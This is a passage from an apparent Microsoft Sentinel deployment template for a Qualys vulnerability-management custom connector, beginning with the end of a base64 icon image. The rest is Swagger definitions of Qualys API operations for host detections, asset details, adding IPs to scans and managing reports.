zmeWZQZw7nyyNjSG4CQFKS+zODOUs4bx4ZS/ISAJKS3D3Zj/WcP8aSzASAhCT2x3v87fRnC0KAMSUrASCh6ok9ir97/NlS9RCgC5CTAJCMB3g8zFYUf3ZQPQQYW+YZ4QmTAkAy1R/goV3LniqfXx4ONM8Ivy8BIJHqCV3x5wiVzzNdgOl0ADhU5YSu+HOkquebLsB0I/yu7u4frEkqa/4jpxw3fr7B/XORzKtenM4PzlLxcbk22U4z9dw4s/7qACRRtfh7gQtnqnj+VR1rMhIAEqh6j24Mvu7150xV3yLouQA5CAAJVLxHN9pXij89iPNwTRt3RJ4LkIMAMLiqSdwaJD2peD66I2B8AsDgKiZxm/7oUbXz0l6A8QkAA6s4+7fpj55VOz/tBRibADCwarN/6/70rtp+AHsBxiYAMAzr/ozAecooBIBBVduAY92fkVQ6X20GHJcAMKhKG3Cs+zOiKksBNgOOSwAYULWNN9b9GVGlpQCbAcckAAyo0sYbrX9GVuX8tRlwTAIA3ar2dDVych7TKwFgMJVabXZTk0GV89hmwPHcXS6X+zWbONak2ynHjZ+vEDyr8vpRL/ohkwjuFdrkluyeTQ1EZ9ZfHYCBVJr9K/5kUuV8thlwLALAQH799run73IziyCjCrezVhmjshAABlLhflsbpsiqwmOCK4xRmQgAg6jSWrPfg8wqnN+WAcYhAAyiQmvNE/+oIHsXwDLAOASAQVRordn4RwXZuwCWAcYhAAygQkvN2j+VZD/fLQOMQQCgC9b+qcT5Tg8EgAFkf4CItX8qytwF8G6AMQgAnM7aPxXpAnA2AaBz2dfSrP1DTtX3AXzzy89P3/Wr+wBQfUdp9laaWRCVZV7+qr4MMMJ/vw4AwEksf+U1QndTAOA0Nv+B6yCrEbrXd/cP1iSVNf+RU44bP7/qy2FiDS1zG81Lf+BR1td8R7ip2uWY+pmeWX91ADqWufib9UB+1fcB9E4A4BTWPuGZQMwZBACAkwnEnEEA6FTme2jNduCtEXaNL+G9AP0SADqV+ZWaZjvw1ggPjlnC64H7JQB0qvoDkKCarMHYWNYvAYBDaf/DbVmXAeiTANChzGtm2v9wW9ZlAPsA+iQAAHRCQOZIAkCHsm6a0f6HmmwE7JMA0KGsm2bMbuBzGYOyjYB9EgAAOiIocxQBgEPY3QzQFwGgM1l3y2bd3QxM406A/txdLpf7ta8UXGrqcSu9NjYukoxv0PLqX5gu4zgQexsqLW/E64Cn1Mcz668OQGfslgUyFspqY9sIy54CQGcy7pa1/g9kHNs+MsJ/rwDA7qz/A/RHAGB3bmuC+XTO2JsAANAhnTP2JgAAQEECQEcy3ierjQnLZFw68yyAvggA7EobE6BPAgAAFCQAdCTjgzLcAQDLZVtC86CzvggAAFCQANCRak/KAj6WbQ+NMa4vAgC7cQcAQL+GCABuHQEqsodmTKPUrLv7B2tmamtaOlOOGz+/ymsk4/WRmVR7/SfsIdu4UOHV4HNe53xm/e2+A6CNDADb6z4A2DQCANvTAWA32v8A/dIBAICCdAAAoCAdAAAoSAcAAArqPgAEL5AAYBSj1KwhAgAAsC0BAAAKEgAAoCABAAAKEgAAoCABAAAKurtcLvdrXym41JzjVniFpNd+Aq8ZF8YTn9nU2nhm/dUBAIANjfIAOwEAoFNf/+WvT98xklEeYS8AAMCGdAAAWMVj0MekAwAAV0aZGa+lA8Bs2S4O65ewzigzSV7SAQAAuiUAAHCIb375+ek7eiAAdCTbxWEDEyxnCY29CQAAHcoYoH//6cen7+iBAMBubGCC5Vw/7E0A6Ih0DMBRhgkA1sOAKox34xrps9MBAICC7u4frHkAzZp1qqnHjWP89sP3JVrk2V79WeVzgy1lGwdCjPdf//lPT3+XV3QA/vC3vz/93efOrL9DdADW/IIAOJ9nAPRniABQaTdstrDjWQAwj/V/jmIPQGeypWS3MsE8WUNzlaXAkT6/YZYAzCSBCoRmjqID0Bkb5qAu7X+OJACwO4MaTJO102kjd58EAIBOZG3/V7oDYKTPcJgAYF1sXHPuiYWqMnfKLG32SQegQ9plUI+gzNEEgA55YAYAexMAOpSxXWYjINz2+z/++fRdPjqa/RIAOITnOMBtmfc46Wj2a5gAECnSLHJcNnHC+7KPa5U2AI72WQ4TAKoVEG0zqMHmP85yd7lc7tcU1zWFau5xK71aNpJktoHBq4HhrYyv/r32f//9X0/f5Rfj9tzlzjPr71B7ACqtI2cslGY68FLmzX8hQn8lo9WooQJAtWUAILfsY5qOX9/cBcChbOSER9ln//RPAOhYxvaZZQB4lH32X3Ej82ifqQAAcLAKs3/3//dPAOhY1vUzywBUV2E/k/X//g0XABSP8VkGoDJr/zmNWJt0ADpX7TYayK7C7L/quDXavofhAoBnyuegk0NF2R/601Rs/49Ym4YLABXS87WsF5JlAKoRenMbsTZZAgA4QJXQq/0/DgFgAFkvKJuhqKLS7L/q7n8dgINUa6VlvaCqLedQlyWv3EatSToAnMq6KNlV2fgXKt+1NOISwN39g7WvFFxqzXG//vOfnr6rIQpl1llEpdeFUkvm6/Y9Va/lWM5cWgvPrL86AJxOF4CstP5rGHU5c8gAUHHtOPPGGoMkGVVq/QcPLRvPkAEgWhcVZ41rWkW90wUgk4rnc9Xd/yN/1joAA8n8di1dADKpdj5nnpxkNmwHoOIjgbMnbF0AMqjW+g/VNmVfG7kWDbsJsGoXIHPS1gVgdEIsIxk2AFSVPWkbQBlZxRBbffPfyJPRoQOAYpGPLgCjqtj6D1U3/4XRa5AOwICyb7gR7BhN1eLv1r+xx+OhA0DV2WL2ZQBdAEZSObBWnv2H0Tej6wDQJV0ARhDnadXA6ta/8TejCwCDyt560wVgBJXP08q3/mUxfACoOlOs0HqLF2xAr6qu+/MoQ+0ZPgBUTuDZuwDRXrMUQI+qF3+b/x7X/0dfBrm7XC73a9Yx1vwCtjhu/IzKr5OtMBB5XTA9qbzu37gmX469Z9fBJeK49gDQPUsB9ELxN/vPJEUAqNwmrnAxrknIsBXF/1H1W/9ClpozfACIFkjFFwM1VS5GG644m+Jv9t9kORdSdACqzxCrXJSWAjiLAPrI7D+XNHsAKi8DVLkoI+hV/pw5h+L/yMa/R5nGoBQBYM1OyCyq/A60YTmS4v/IGJtTmg5A9cJQ6alcBmWO4Dx75ql/zzLVmjQBgFobdCwFsCfF/5mNf3mlCQDRoqpeFCpt0IkULgSwB8X/JRv/nmUbc1J1ACrfDthUWquzH4CtKf4vmf2/lG3MSRUAPDCm3lqdAZutOJfeMvvPLVUAsAzwqNqOXQM3azmH3nLb30sZa0u6TYCWAWru2BX8WErxf8ttf29lXHJMFwAsAzyqdgHbFMgSiv/73PZXw939gzXFYk3B3eu4sXHF2lXNwc1nz1SK//tcQ++L8+VWzeqxDn4mjpuuAxAsAzxac2KNyp0BTKH4vy/GDMX/rXgPScbxNGUAsAzwqGobz+DOR5wft2n915IyAATrwY+q3sdrkOc9zovb3PP/vqglWSeVaQOAVvCjyu08gz1NDOLOh9u0/m+LJeWsy6lpAwDPKt/Pa9Anir8Jwce0/m/LvKScOgBYBnhWcUNgIwTUpfh/Tuv/tuw1JHUAcOE/q57whYB64jM3BnxM6/9jmdv/wRJAIdWTvhBQh896Gq3/j2W/oyx9ALAM8EzSVxiyi+vdZzyNZ/1/rELtSB8AtABfctELAVlZ75/Ouv/n4lzKvnfKEkBBlTcENkJALvGkNsV/Guv+NCUCQAwOPLPu9yhCgCWi8cXn6Omf07n+P5f10b+vlQgABoe3tAAfmTWOy3r/fJYAp6lSM8osAZjpvRQtQEsBj6KI6BKNRct/PsV/mkq14u5yudyvSTtrisjRx9X6essM6lmcU86R/jln54uOn3X/aZacXyPVwSaOW6YDUKWlM5elgGdxjigu/dLyXyaKhOLPe0rdBWAZ4C1LAW8pMv3R8l9OV2u6akuBZQJAFDkDyPsMEG9FCBAY+xCfhQ7eMtb956l2npXqAEQIMKi/z0DxVgRGmwPPE7973ZjlXNPzVKwNpQJA0AW4zX6At+wLOIdZ/zqK/3wVa0O5AKALcJuNQrdZEjiGWf96iv98Va/tcgEg6ALcZvC4zZLAvsz619PFWyZe+1tRyQDAxwwit1kS2I/zbp34/eniLVM1eJYNAGZyt8UgYjD+mCWB7cV5Fx0o5958iv9yUQuq3gpdNgBoNX7MYPK5WBLQDdheCwLx5RkVn1P816lcC0ovAZjBfcx+gGl0A/YTz6gQBG5T/NeJ67byuVU6ANgM+DkhYBrdgH21IBAFTxh4pPivV70GlN8EaC/A52KgYRrdgH1FwbsOA1Up/utVn/2H8gHAXoDPxUBj1jWdbsAx4ryMIFAtDCj+29AB/uqru/sHawb3NQW0h+PGz3FBTaOozRfnmnctHCtmdnFfd8Zwb6zaRpwjrwNAxTpYPgCE+FnWuqcRApYxcJ8nlvnWjBe9MEZt571xrGIdLL8E0Fi3ncYgtIxlgfO0PQNtqWDNgHsW1912jPXPBIAHMSBYD5rOYLRchAAbT88TXZjRAoHrbVvG+mcCwBXJcLoYOFkm2nYRBJxv5+s5EMSfQ/HflmvuJXsArsTPdMFNFxeTNL2e/QF9i/P86E2Fzol9fLQMV7EO6gC8IiFOFwOUTsB6bX+Ac69Pr7sErVOwV7dA8d+H6+stHYBX4ufqAsyTZZd1D+LcdNvguFqRWdoxMPbs57NNuBXroADwSvxcCXy+GPgsB2wnzlFBIJfrGWh7//z1OKb472fK+FSxDgoA74if7WKcTydge3GuCgKwzmez/1CxDtoD8I4vg671otkUqu3FBR6Dl1sHYRlj+W0CwA3a2cvonOxDEIBljOW3CQA36AIsJwTspwWB+HJ+wsdcIx8TAD4gOS4nBOwvzk9BAG4zhn9MAPhAdAG0XJcTAo4hCMBbxu7P3V0ul/tRdzAuNfe4Ctk6UZw4zpflKxsyKS7GnTl1omId1AGYQAFbJwLUmhOVeeLCjnNWV4CqYvZvzPmcADCRgXSdmJF6bPDx2vKAdihVxFi9ZlZdiQAwkc0k63l3wHl0BaginrJo9j+NADCDgXO9CAEuznNddwWc02Ri9j+PADCDLsA2YjnAxsrzxUDpDgIyifPZBGM6AWAma6nbsRzQjxYEhAFGZePffALAAgbIbcRygE5Af4QBRqP1v4wAsIClgG0JAf0SBhiBMXkZAWAhg+G2hID+CQP0yLm4nACwQKwzSZzb88CgcQgD9MJYvJwAsFAUKhsCt+eBQeMRBjhLnHMsJwCsZMDbns2B43odBlwf7MW5tZ4AsJL2036EgLHFtdECgYcOsTVj73oCwAYMbPuxLyCH64cO6Q6wluXXbdzdP1gzwK659zLTcc1W9xXFQuLPK/Z9xNIPTBEh8r1xXD2aLo6rA7CROCHZj30BuV13BywX8JFbxZ/5BIANGbT2Z0kgv5jVCAS8x3mwLQFgQ1rUx3CrYC0CAU2cByYA2xEANhYDFPuzJFCXQFBTfM6K/7YEgB0YjI5jSQCBIL/4PNdseON9AsAOLAUcK5YEdANoXgcCoWB8Wv/7EAB2EoMOx9IN4Jb3QkEEAqGgf1r/+xEAdmRwOZ4NgkwVgeA6FLQugeu2H/FZaP3vx4OAZpp7XK3p88SAbvBgjRgrvvnl5y/fe1DR8SKYzRmv1aPp4rg6ADuLE5hz6AawVgywrzsF190C9jO3+DOfAHCAGCw4R7td0EDClloweC8UCAbrxe/SNbs/AeAAMVgYFM7lTgH29lm3wBgwTfye1rS2mc4egJnWHFcB6kMMMDFIw9liLLLH4KUITUvHaPVoujiuADDT2uPGTJQ+xMxszecJe4mxogWDUCUcrCn+QT2aLo57d7lc7v3Splt7XK897YtuAKOJMSjjWLLFtageTRfHtQfgYIpNX9omQXcLMIpWMLJNJGJsXFPQmE8AOEG0uehLCwIGIEaQLbCubf2zjABwErcG9sndAvQuCmWm2b9b/s4jAJwk2nhuC+qXZQF6lWkjsVv+ziUAnMh+gL7ZH0BvsnWnrPufSwA4mf0A/RME6IF1f7YmAHTAfoAx2CjIWaL4W/dnawJAB+wHGEvbKGgA4whxnmUq/tb9+yEAdMJ+gPEIAhwh29NDrfv3QwDoiP0AYxIE2EucV5lY9++LANAZIWBcggBbylb8rfv3RwDokP0AYxMEWCtb8bfu3ycBoEOxRiYEjK8FAbcPMke28yXGMuv+fRIAOmVTYB5uH2SqbLf7BcW/X3f3D9Z8OGvaOo77sThWtlYgzzMiuJax+C/Z06QuTLf2uDoAHYsPyEOC8mkdAUsDNIo/ZxAAOhcJz36AnFoQsDxQ25egn6z4G7PGIAB0LgYHmwLzs2Gwpvi847PPxBLXOASAAQgBdVgeqCPjzD8o/uMQAAbiwqrD8kBuGWf+wZP+xiIADMbGmnosD+SSdeav+I9HABiQEFCTrsD4ss78PeZ3TALAoNweWNt1V8DAO4b4rDLO/GNv0pr70TmPADAotwcSoqBYIuhf5uIfe5OE0DEJAANzZwDXrpcIhIF+ZC3+QfEfmwAwOCGA97QwEMVHGDhP5pm/TX/jEwAScHsgt0Txue4MGLCPE7/vrDP/X7/9zrmUgACQhDsDmOJ6v4DOwH7id5yVsSYPASARFyZT6QzsJ3Pxd7tfLneXy+V+1FcZLpX9uBnvM+Y4bWc385n5PzI+T3fmcXUAkokP1TMCWOO6MxDLBGsGmSrid5R95k8+AkAyMRBFCHBnAFuIMGDfwMfid5K56xZjyZpZKv0SABKKEOD2QLb2et+AMJD7Hv9gOSg3ASApIYC9XYeB+Kq2VBD/zYo/IxMAEhMCOFJbKoivmBlnDQTx3xX/jdkp/vkJAMkJAZwhZsYZA0H29f4QY4VbimsQAIoQAjhThkAQf+7MLf8mxoqs3RteEgAK0dKjF6MFgvgzVhAzf8W/DgGgGK09evQ6EPQSCuLPoPiTlQBQkBDACN7rEhwZCuKYFVr+QfGvSQAoSghgNFGMjwgF8bPiZ1eh+NclABQmBDC6rUNB/Pvxs6pQ/GsTAIoTAsjmvVDQgkEUu/cKXvx/8c9UovgjACAEUEILBa+DQXzF/1eJ4k+4u3+w5kQ481WGSznuW/Hzq82AoKKpgd84Od2ox9UB4Is4GXQCIDfXONcEAP5NCIC8XNu8JgDwghAA+bimeY8AwBtCAOThWuYWAYB3CQEwPtcwHxEAuEkIgHG5dvmMAMCnDCQwlrhmI8DDRwQAJhECYAyKP1MJAEwmBEC/vv7LXxV/ZhEAmCUGmBhogL784W9/V/yZRQBgthhogD6Y+bOUAMAiOgHQBzN/lhIAWCwGHiEAzmHmz1oCAKsIAXC8uObM/Fnr7nK53HuF4nSO+1b8/N9++L7cO9XhDK34T2G8mq7icXUAWC1OwhiQfv/HP5/+F2AP0fKfWvzhMwIAm2hJVAiAfUTxhy0JAGxOCIBtKf7sQQBgFwYs2IZrib0IAOwilgQMXLCOa4g9CQDsKgYwtwnCPO7x5wgCALvzrACYzj3+HEUA4BBCAHxO8edIAgCHiYHNmia8L+6eUfw5kgDA4YQAeKndOqv4cyQBgFMIAfDItcBZBABOEwOffQFUFed+XANm/ZxFAOBUNgdSkc1+9EAA4HRCAJUo/vTi7v7BmhPRqxunc9zb4jjxz3/95z89/S+Qz5L1fuPGdI47XRxXB4AutIvAhiiycm7TGwGArkQQsDmQbBR/eiQA0J0IAfYFkEGcw4o/vRIA6FaEgPaAFBiNzX70TgCga7HJxQyK0XisLyMQABiCEMAo2rmq+NM7AYBhxMBqXwC9auv9Cj+jEAAYin0B9Mh6PyMSABiOfQH0xHo/oxIAGJYlAc5mvZ+RCQAMLWZeQgBHs95PBgIAw4sQYEmAo2j5k4UAQBpCAHvT8icTAYBUYoC2JMDWtPzJ6O5yudx7heJ0jjvdmceNf9+rhdlCtPzXnMvB9Tud40639rg6AKQUJ7clAdbS8iczAYDULAmwhJY/FQgApBc7tj09kKns8qcKAYASLAkwhZY/lQgAlGJJgPdo+VORAEA5lgS4puVPVQIAJVkSIGj5U5kAQGmWBGrS8gcBAL60f3UD6tDyh0cCADzRDcitzfqD4g8CALzw67ff2SCYkFk/vCUAwDssCeQRn+Wa561DVgIAvCNmipYExhazfkEObhMA4IYIAZ4ZMCazfvjc3f2DNetiay4yx53Ocafb67i//fD9V7//9OPT39Gj6Nh8tNbvfJ7Ocacb9bg6ADCR2wX7ZqMfzCMAwEz2BvTF7X2wjAAAC+gG9MGsH5YTAGAF3YBzmPXDegIArKQbcCyzftiGAAAb0Q3Yl1k/bEsAgI1EUYqZqecGbC8Kf/xuge0IALChNjPVDdjG9awf2JYAADvQDVjPrB/2JQDATnQDljHrh2MIALAz3YDpzPrhOAIAHOC6GyAIvBW/E7N+OJYAAAdqQSAKnmWB53b/mpeaAMsIAHCS6ssC2v1wrrvL5XLvFYrTOe50jjtdpVcNx6w/Cv/S37XzajrHna7icXUAoANVugFt1r9m4AK2IQBAB1pBzLpJ0CY/6I8AAB25DgIZNgna5Af9EgCgQxEERl8WaO1+oE8CAHRq1GUB7X4YgwAAnRtlWUC7H8YiAMAg2rJAb0GgFX7tfhiLAAADiRAQX79++10XywLxZ1D4YUwCAAzsrG6Adj+MTwCAgR29LNAKf3QggLEJAJDE3kEgfnYco21KBMYmAEAyLQhspd3W1/YfADkIAJBUFO01GwWv7+dX+CEfAQASi016UcTnLAu0df6g8ENed/cP1lzka3YBO+50jjud477Vfv5Hrx2Owj/nlj6/5+kcdzrHnW7tcXUAoIC42OMrdu+/Xhporf45xR8Y3Vdf/T+/mzSmwJqY7QAAAABJRU5ErkJggg==", + "swagger": { + "swagger": "2.0", + "info": { + "version": "1.0.0", + "title": "QualysCustomConnector", + "description": "Qualys VM is a cloud-based service that provides users immediate global visibility into IT inventory vulnerabilities and helps continuously monitor latest Internet threats." + }, + "host": "[[replace(replace(parameters('Service Endpoint'),'https://',''),'http://','')]", + "basePath": "/", + "schemes": [ + "https" + ], + "consumes": "[variables('TemplateEmptyArray')]", + "produces": [ + "application/json" + ], + "paths": { + "/qps/rest/portal/version": { + "get": { + "summary": "Get Portal Details", + "description": "It fetches the Qualys Portal Component Versions.", + "operationId": "[[variables('_operationId-GetPortalDetails')]", + "parameters": [ + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "x-ms-summary": "X-Requested-With Header", + "description": "Mandatory Header Required by Qualys API", + "x-ms-visibility": "internal" + }, + { + "name": "Accept", + "in": "header", + "required": true, + "type": "string", + "default": "application/json", + "x-ms-summary": "Accept Header", + "description": "Header to get result in JSON Format", + "x-ms-visibility": "internal" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Vary\"": { + "description": "\"Vary\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-Xss-protection\"": { + "description": "\"X-Xss-protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"Set-Cookie\"": { + "description": "\"Set-Cookie\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + } + } + }, + "/api/2.0/fo/asset/host/vm/detection/": { + "post": { + "summary": "Get Detections By IP", + "description": "Get Vulnerability Details for an IP", + "operationId": "[[variables('_operationId-GetDetectionsByIP')]", + "parameters": [ + { + "name": "ips", + "in": "query", + "required": true, + "type": "string", + "description": "IP Address to Fetch Vulnerability Details", + "x-ms-summary": "IP Address" + }, + { + "name": "action", + "in": "query", + "required": true, + "type": "string", + "default": "list", + "description": "To fetch the Scan Results", + "x-ms-summary": "Action", + "x-ms-visibility": "internal" + }, + { + "name": "truncation_limit", + "in": "query", + "required": false, + "type": "integer", + "default": 100, + "description": "Truncate the result to provided limit", + "x-ms-summary": "Truncation Limit", + "x-ms-visibility": "advanced" + }, + { + "name": "output_format", + "in": "query", + "required": true, + "type": "string", + "default": "XML", + "x-ms-summary": "Output Format", + "description": "Scan Result Output Format", + "x-ms-visibility": "internal" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "x-ms-summary": "X-Requested-With Header", + "description": "Mandatory Header Required by Qualys API", + "x-ms-visibility": "internal" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/asset/host/": { + "post": { + "summary": "Get Asset Details By IP", + "description": "Get Details of an Asset", + "operationId": "[[variables('_operationId-GetAssetDetailsByIP')]", + "parameters": [ + { + "name": "ips", + "in": "query", + "required": true, + "type": "string", + "description": "IP Address to Fetch Asset Details", + "x-ms-summary": "IP Address", + "x-ms-visibility": "important" + }, + { + "name": "action", + "default": "list", + "in": "query", + "type": "string", + "required": true, + "x-ms-summary": "Action", + "x-ms-visibility": "internal", + "description": "To fetch Asset Details" + }, + { + "name": "details", + "default": "All", + "in": "query", + "type": "string", + "required": true, + "x-ms-summary": "Details", + "x-ms-visibility": "advanced", + "description": "Flag to Fetch Amount of Details", + "enum": [ + "All", + "Basic", + "None" + ] + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/asset/ip/": { + "post": { + "summary": "Add IP For Scanning", + "description": "Add a New IP For Continuous Scanning", + "operationId": "[[variables('_operationId-AddIPForScanning')]", + "parameters": [ + { + "name": "ips", + "in": "query", + "required": true, + "type": "string", + "description": "IP Address to Add For Vulnerability Scanning", + "x-ms-summary": "IP Address", + "x-ms-visibility": "important" + }, + { + "name": "action", + "default": "add", + "in": "query", + "type": "string", + "required": true, + "x-ms-summary": "Action", + "description": "Default action to Add a New IP for Scanning", + "x-ms-visibility": "internal" + }, + { + "name": "enable_vm", + "default": 1, + "in": "query", + "type": "string", + "required": true, + "x-ms-visibility": "internal", + "description": "Flag to enable VM Scanning", + "x-ms-summary": "Enable VM" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "description": "Mandatory Header Required by Qualys API", + "x-ms-summary": "X-Requested-With Header", + "x-ms-visibility": "internal" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "$content-type": { + "type": "string", + "description": "$content-type" + }, + "$content": { + "type": "string", + "description": "$content" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + "\"X-RateLimit-Remaining\"": { + "description": "\"X-RateLimit-Remaining\"", + "type": "string" + }, + "\"Date\"": { + "description": "\"Date\"", + "type": "string" + }, + "\"X-Powered-By\"": { + "description": "\"X-Powered-By\"", + "type": "string" + }, + "\"Content-Type\"": { + "description": "\"Content-Type\"", + "type": "string" + }, + "\"Content-Length\"": { + "description": "\"Content-Length\"", + "type": "string" + } + } + } + }, + "x-ms-visibility": "important" + } + }, + "/api/2.0/fo/report/": { + "post": { + "summary": "Report Operations", + "description": "List, Launch, Fetch and Delete Scan Reports", + "operationId": "[[variables('_operationId-ReportOperations')]", + "parameters": [ + { + "name": "action", + "in": "query", + "required": true, + "type": "string", + "x-ms-visibility": "important", + "enum": [ + "list", + "launch", + "fetch", + "delete" + ], + "default": "list", + "x-ms-summary": "Action", + "description": "Choose Action According to Operation" + }, + { + "name": "id", + "in": "query", + "required": false, + "type": "integer", + "x-ms-visibility": "advanced", + "description": "Mandatory for List, Delete and Fetch Actions", + "x-ms-summary": "Report ID" + }, + { + "name": "template_id", + "in": "query", + "required": false, + "type": "integer", + "description": "Mandatory for Launch Action", + "x-ms-summary": "Report Template ID", + "x-ms-visibility": "advanced" + }, + { + "name": "report_type", + "in": "query", + "required": false, + "type": "string", + "x-ms-summary": "Report Type", + "description": "Mandatory for Launch Action", + "enum": [ + "Scan" + ] + }, + { + "name": "report_title", + "in": "query", + "required": false, + "type": "string", + "description": "Mandatory for Launch Action", + "x-ms-summary": "Report Title", + "x-ms-visibility": "advanced" + }, + { + "name": "output_format", + "in": "query", + "required": false, + "type": "string", + "x-ms-visibility": "advanced", + "description": "Mandatory for Launch Action", + "enum": [ + "pdf", + "html", + "mht", + "xml", + "csv", + "docx" + ], + "x-ms-summary": "Output Format" + }, + { + "name": "X-Requested-With", + "in": "header", + "required": true, + "type": "string", + "default": "Sentinel", + "x-ms-summary": "X-Requested-With Header", + "description": "Mandatory Header Required by Qualys API", + "x-ms-visibility": "internal" + } + ], + "responses": { + "200": { + "description": "default", + "schema": { + "type": "object", + "properties": { + "body": { + "type": "string", + "description": "body" + } + } + }, + "headers": { + "\"Transfer-Encoding\"": { + "description": "\"Transfer-Encoding\"", + "type": "string" + }, + "\"Strict-Transport-Security\"": { + "description": "\"Strict-Transport-Security\"", + "type": "string" + }, + "\"X-XSS-Protection\"": { + "description": "\"X-XSS-Protection\"", + "type": "string" + }, + "\"X-Content-Type-Options\"": { + "description": "\"X-Content-Type-Options\"", + "type": "string" + }, + "\"X-Frame-Options\"": { + "description": "\"X-Frame-Options\"", + "type": "string" + }, + "\"X-RateLimit-Limit\"": { + "description": "\"X-RateLimit-Limit\"", + "type": "string" + }, + "\"X-RateLimit-Window-Sec\"": { + "description": "\"X-RateLimit-Window-Sec\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Limit\"": { + "description": "\"X-Concurrency-Limit-Limit\"", + "type": "string" + }, + "\"X-Concurrency-Limit-Running\"": { + "description": "\"X-Concurrency-Limit-Running\"", + "type": "string" + }, + "\"X-RateLimit-ToWait-Sec\"": { + "description": "\"X-RateLimit-ToWait-Sec\"", + "type": "string" + }, + 